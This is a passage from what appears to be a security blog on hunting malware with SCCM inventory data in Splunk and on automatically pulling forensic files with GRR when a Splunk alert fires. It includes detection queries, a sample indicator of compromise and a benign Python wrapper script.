<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you see ‘svchost.exe’ in an appdata or temp folder, that would be red flag to investigate further. To take this example further you could include other common windows filenames with: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">WHERE FileName IN ('wininit.exe', 'svchost.exe', ‘services.exe’) group by [FilePath]</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It will be obvious where to investigate further by looking at the outliers. If you investigated enough malware infections you will no doubt have a list of clever names used my malware authors such as 'system.exe', 'lsass.exe', 'services.exe'. Also keep in mind the data collected by SCCM the next time you read about a new threat and how it can be used to quickly search for indictors of compromise.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Executables in $Recycle.Bin</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="123px;" src="https://lh5.googleusercontent.com/VM8Z33dJqsWlC-IJVDgvG-tCB8NWKDfIrONiaMmFDXsZfMmZLu3B6l3_66ay-xSaM1kwU5DxrDmyW1CUHM0JsTYhrqkpvut_wsf5_t_TobaKllN9STzE0J8n6h0r9LPs97eehzKe" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="456px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Service outliers, least frequency of occurrence by path on disk:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="43px;" src="https://lh5.googleusercontent.com/Y88mUffQsbMCbJM1L04HpnpyO0p7UrJRBYfG3yQqI6XoSVKLGypCwqr34UY_-_M0rJ-M7oylEOHskyvGe86kBV2N33Gb--oGITKOAtnXyqIz0QV0SA2_YgRs1WTiGIu62sd4JEhr" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="399px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Search for a service where the executable is located in an odd place like %temp% or %appdata% by appending: </span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-style: italic; line-height: 1.38; text-align: center; white-space: pre-wrap;"><span style="font-size: xx-small;"> WHERE [Name0] LIKE ‘%temp%</span></span></blockquote>
<br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; line-height: 20.24px; white-space: pre-wrap;">Using the same methodology, search for least frequency of occurrence based on filename. Since you have the data in Splunk you might even add an alert based upon new service running on a domain controller or publicly accessible server. </span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you’re feeling really adventurous, try checking out any executables hanging out in temp folder. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="119px;" src="https://lh3.googleusercontent.com/wJUPEOPGJ0RwxfC_zF3x6n14XZY46B2T2_F3TwdWcnPO7S9UhWwAymVoMZ5JspJxor9VrSo_1Tgm0tfdGRSHWiQW0f06c7PxMWews5ZYF__0SFUY2pu4xTSA-P44PbE6XvhVI28B" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="461px;" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Fast Triage All the Files in < 1 Minute.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you have an incident occur or just want to triage some intelligence across the enterprise using static indicators like:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Filename</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Filepath</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Internal File Description</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span class="Apple-tab-span" style="font-family: "arial"; font-size: 14.6667px; line-height: 20.24px; white-space: pre;"> </span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">Internal File Version</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span class="Apple-tab-span" style="font-family: "arial"; font-size: 14.6667px; line-height: 20.24px; white-space: pre;"> </span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">Files Modified Timestamp</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span class="Apple-tab-span" style="font-family: "arial"; font-size: 14.6667px; line-height: 20.24px; white-space: pre;"> </span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">Autorun </span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 20.24px; text-indent: 36pt; white-space: pre-wrap;">persistence</span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">: Registry key/value or file/lnk in startup folders.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You can use those indicators to quickly triage every binary file (or any file metadata you’re collecting) in your enterprise that was available at the time the client inventory process was ran. If you don't have the files internal file description in the provided intelligence, consider looking up the MD5 on <a href="https://www.virustotal.com/" target="_blank">Virustotal</a> to get it.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In previous investigations I came across malware with the internal metadata company name of “Microsoft Corp.” which is unique since Microsoft doesn’t abbreviate Corporation. Using this we could triage every executable in the enterprise to see any others executables have this company name:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="98px;" src="https://lh4.googleusercontent.com/7zmwwOKAoMhICW0ZxDRsJgwkQJ07K2jYxfxffi3YR3XgbKf_BkLr_QneUViRkiCPvy_a1Hna542BTBQihLx4dLKapaBAn2bP6ZWZy0ycKS7w8HU0eRT9qB2WbEV2oaxlkNPystRZ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="557px;" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The same could be done with filename, path or using a combination of the collected metadata e.g. any executable between 55K and 57K modified in the last week. This is a good way to quickly search the enterprise while your other hunting tools are still running, but keep in mind this is searching a snapshot of time, you should know at what frequency your SCCM server collects this information.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Security Agent Health Monitoring & Coverage</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As a bonus, throw in some queries to check if your security agents are installed and if their service is started. As an example, here is query to check for hosts that do not have <a href="https://github.com/google/grr" target="_blank">GRR</a> installed. In this example you can replace GRR with any application, keep in mind this query checks if the service is </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.6667px; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><u>not</u></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> present. Its also possible to query add/remove programs but you get more bang for the buck by querying services. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Add the following DB input query:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SELECT DISTINCT [ResourceID], </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[Name] AS Missing_GRR </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">FROM [SCCM].[dbo].[v_GS_SERVICE] </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">LEFT JOIN [SCCM].[dbo].[v_ActiveClients] [Name] </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ON [ResourceID] = [MachineResourceID] </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WHERE [ResourceID] NOT IN </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(select [ResourceID] FROM [SCCM].[dbo].[v_GS_SERVICE] </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WHERE [DisplayName0] = 'GRR Service') AND [Name] IS NOT NULL</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Set the input to run every 24-hours and now you can use a simple query in Splunk to see what hosts don’t have your security agents installed:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="172px;" src="https://lh5.googleusercontent.com/ilEPGyL0sZL8XqYRBv1Lc4o3bxc2KNNE5O4ANBQDI-TQlQs4ujFPB0N_jFbOjRadmAVOCCkT9gD-Wm9iZUd90CdWD3MKwVZZ0CxFa8mRm4raFxZHouPT7yvkwWkt7GbqlBMltzgL" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="556px;" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Add in another DB input to query the status of services for your security agents that are installed:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="147px;" src="https://lh3.googleusercontent.com/bt47EOmXiOoLQphpV0GdALFhpb9qRLpfAL8q7UGoatmcfsebEValNS70DzYKvABpp7gt9-49TPdGe-OoPJ1f9gDUx1iUsBd6pWpAHfd_YA-w704PYHbnVCVOXAPb21ug0lFXqW02" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="623px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In Splunk you can search for disabled agents with:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=sccm StartMode=Disabled |stats count by Service</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="278px;" src="https://lh6.googleusercontent.com/0KEY77beOii37g6i7oBbRVShTQXzivY2vq4N2XIsLC0i5r-UfydZj2KiKnGJuTjqj0k9y5SxW_GT1TfaOtDwXeVlKOOprifNFzf0mi1pOrJ7gqTwbopZXT3CiKlYJJXL9kd7yk4P" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="474px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now you have pretty picture to show you how many of your security agents are missing from endpoints. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As you can see there is a lot of good data to find evil, and also to search for indicators of compromise from known threats or when you receive new intelligence. This is only scratching the surface, but hopefully it will give you some ideas that are useful in your enterprise. While SCCM doesn’t collect everything, sometimes it collects enough to get you what you need for hunting or during an incident. If you found anything useful for malware hunting or DFIR in the SCCM database, please share it with me <a class="g-profile" href="https://plus.google.com/107420357665242655156" target="_blank">+Keith Tyler</a> </span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cheers and happy hunting!</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-15197144007562842112015-10-21T14:00:00.002-07:002015-10-21T14:00:58.883-07:00Automating Forensic Artifact Collection with Splunk and GRR<div class="tr_bq">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Recently I had the need for <a href="https://github.com/google/grr" target="_blank">GRR</a> to collect forensic artifacts when a Splunk alert was triggered. The point of this is to collect the forensic data when an incident ticket is generated, to save IR staff time and eliminate redundant tasks.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Example Scenario</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">When a pre-defined malicious event is seen, Splunk will send an email with event details to the ticketing system and IR folks will investigate. One of the first steps in the example below is to acquire the files in question with GRR. To save time we will want to automate the collection of evidence.</span><br />
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">AV does a horrible job of detecting malicious scripts like <a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-110322-0143-99" target="_blank">JS.Proslikefan.B</a> <span style="font-size: xx-small;">(and anything malicious in general)</span>. However, with the help of <a href="http://digirati82.com/wls-information/" target="_blank">WLS</a> this is simple to detect and alert on. Splunk search:</span><br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">`wlslogs` (EventID=4688 OR EventID=592) InternalName=wscript.exe BaseFileName!=wscript.exe</span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;">To briefly explain this alert, JS.Proslikefan maintains persistence by executing a 'random filename.lnk' file in the startup folder. The LNK file executes a randomly named copy of 'wscript.exe' in the appdata folder along with the malicious script. When a person logs on to an infected machine it would generate a WLS event like this (snippet):</span><br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">BaseFileName="udpbat.exe" </span><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-small;">InternalName="wscript.exe" </span></span><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-small;">CommandLine="C:\Users\tupac\AppData\Roaming\avseda\udpbat.exe C:\Users\tupac\AppData\Roaming\avseda\vnyqxluw.js"</span></span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>Process Overview </b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">1. Splunk alert finds execution of 'wscript.exe' when BaseFileName is not 'wscript.exe'.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">2. Splunk alert launches 'wrapper.py' which then launches 'grrRemoteGetFile.py'. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">3. 'grrRemoteGetFile.py' sends </span><span style="font-family: Arial, Helvetica, sans-serif;">GRR </span><span style="font-family: Arial, Helvetica, sans-serif;">an API request to acquire files in question.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">4. Profit.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Splunk uses its own python version which doesn't have modules like 'requests'. Rather than installing modules into Splunk's python, we can just use a wrapper which will use the system default version of python. </span><br />
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Creating the Splunk Alert</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Run the search and when you're satisfied your search has minimal false positives, save it as an Alert.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-5om5NSZ_cyI/ViHC-iVoADI/AAAAAAAAsr8/BeMFT1g9SUg/s1600/savasAlert.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="http://4.bp.blogspot.com/-5om5NSZ_cyI/ViHC-iVoADI/AAAAAAAAsr8/BeMFT1g9SUg/s200/savasAlert.tiff" width="200" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;">When going through the alert wizard, check the 'Enable' box under "Run a script" and enter wrapper.py.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-AWzqhSDi0cQ/ViHDOCppAzI/AAAAAAAAssE/nAWxjIjmcXY/s1600/rapper.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="http://2.bp.blogspot.com/-AWzqhSDi0cQ/ViHDOCppAzI/AAAAAAAAssE/nAWxjIjmcXY/s320/rapper.tiff" width="320" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">wrapper.py (Mashed together from a few examples on the Splunk forums):</span><br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">#!/usr/bin/python
# Splunk runs this with its bundled Python; we re-launch the real script
# under the system interpreter so modules like 'requests' are available.
import gzip, os, sys, csv
from subprocess import call

python_executable = "/usr/bin/python"
real_script = "/opt/splunk/bin/scripts/grrRemoteGetFile.py"

# Splunk sets PYTHONPATH and LD_LIBRARY_PATH for its own Python; remove
# them so the system interpreter does not load Splunk's libraries.
for envvar in ("PYTHONPATH", "LD_LIBRARY_PATH"):
    if envvar in os.environ:
        del os.environ[envvar]

def openany(p):
    # Splunk normally hands us gzipped CSV, but cope with a plain file too.
    if p.endswith(".gz"):
        return gzip.open(p)
    else:
        return open(p)

# Argument 8 is the path to the gzipped CSV search results.
results_file = sys.argv[8]
for row in csv.DictReader(openany(results_file)):
    # One invocation per matching event, passing the host that triggered it.
    my_command = [ python_executable, real_script, row["host"], ]
    call(my_command)
</code></pre>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The wrapper script does the following: </span><br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Removes PYTHONPATH and LD_LIBRARY_PATH from the environment so the system Python does not pick up Splunk's libraries.</span></li>
